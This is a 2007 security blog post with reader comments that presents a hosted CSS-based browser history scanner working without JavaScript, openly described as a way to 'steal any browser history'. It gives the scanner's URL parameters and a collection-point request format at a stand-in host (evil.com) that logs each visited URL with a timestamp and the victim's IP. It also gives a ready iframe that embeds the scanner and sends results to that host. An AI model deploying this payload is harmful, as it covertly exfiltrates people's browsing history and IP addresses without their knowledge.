Noscript HScan

published: February 28th, 2007

After releasing my Firefox specific history scanner, RSnake came up with his own bleeding edge history scanning technique which is based on Jeremiah Grossman’s implementation but it does not require JavaScript. This approach has its own limitations and advantages.

On the advantages side, you don’t really need JavaScript to steal the victim’s browser history. So, everybody who is thinking that turning off JavaScript is the safe way to go, you are most definitely wrong. You should turn CSS off too. This is it. Sparten browsing is the key. On the other hand, history scanning without JavaScript is less powerful in a way that attackers are not able to perform actions as soon as the history is retrieved.

Still, I think that RSnake’s approach is quite interesting and innovative. I decided to write a generic scanner that can be configured on the fly to steal any browser history. The scanner is located here. Before using it you need to pass several GET or POST (it is up to you really) parameters to it:

http://www.gnucitizen.org/blog/noscript-hscan/scan.php?u1=[url]&u2=[url]&t=[target collection point]

The scanner excepts any number of URLs. The only rule is that every URL parameters must start with u (lower case u). It is a good practice to number the URLs that you want to scan as u1, u2, u3, etc. The t parameter is for the target collection point. This is the place where the history information will be sent to. The collection point will receive requests that look like the following:

http://evil.com/path/to/collection/point?u=[url]&t=[timestamp]&c=[ip]

If you haven’t figured out yet how to use the scanner, here is simple builder that could help you:

Provide the target which will log the scanned history for you. You can setup a WAMP instance and simply check the error log for the results for example. You also need to supply a list of URLs that you want to scan. Each URL must be on a new line. The current list includes ALEXA’s Top5.

The easiest way you can launch the generated scanning code is to include it inside an iframe. For example you can use something like the following:

<iframe src="http://www.gnucitizen.org/blog/noscript-hscan/scan.php?t=http%3A//evil.com/path/to/collection/point%3F&u0=http%3A//www.yahoo.com/&u1=http%3A//www.google.com/&u2=http%3A//www.myspace.com/&u3=http%3A//www.msn.com/&u4=http%3A//www.ebay.com/&"></iframe>

» more | » comments rss | posted by pdp | syndication and integration ( )

Comments

anonymous responds:

The PHP download unfortunately gets parsed thus we can get the output, but not the download. You’ll have to change the extension ot pack it into a TAR/ZIP file if you want people to download it.
Thanks a lot!

pdp responds:

That’s the purpose of it. You can use it straight from here… no need to download.

Joe responds:

nice tool, thank you

Franck responds:

Doesnt work here. Not in IE neither FF. I am seeing ‘v’ characters as output. This is supposed to mean ‘visited’? But I never visit those sites. Even a fake url shows up as ‘v’. So I don’t get this..

pdp responds:

Visited sites will show up as pink Vs while not visted sites will show up as simle blue Vs. See the generated CSS for more information how it works.

Respond

In order to preserve the high standards of GNUCITIZEN, before you post a comment, please take note of the following guidelines:

Commenting is provided as a courtesy only.
Please be brief and relevant to the post.
Please be polite even in disagreement with us or others.
Support claims you wish to make using sources and links.
No personal attacks, name calling, or commercial commenting.
Anyone creating false or multiple identities will be banned.
If you don't have a cogent argument, you will be censored.
If you are purposefully deceptive, you will be censored.
No spamming or flooding.

We appreciate your time and effort in contributing to GNUCITIZEN.

name: (required)

mail: (required)

website:

comment:

GNUCITIZEN Products

	Blogsecurify is a division of GNUCITIZEN. The initiative was established to provide social media security services through our free automated testing engine. The Blogsecurify team is also engaged to deliver quality content on issues concerning social media technologies.
	Netsecurify is a division of GNUCITIZEN. The initiative was established to provide network security services through our free automated testing engine. The service is still in private-beta.
	Websecurify is a division of GNUCITIZEN. The initiative was established to provide a free web application security framework for automated and manual penetration testing. The service is still in private-beta.
	Secapps serves as an application directory of all online tools which the GNUCITIZEN team has built over the years.
	Securls serves as an information security intelligence tool, combining news and articles from the best information security resources online.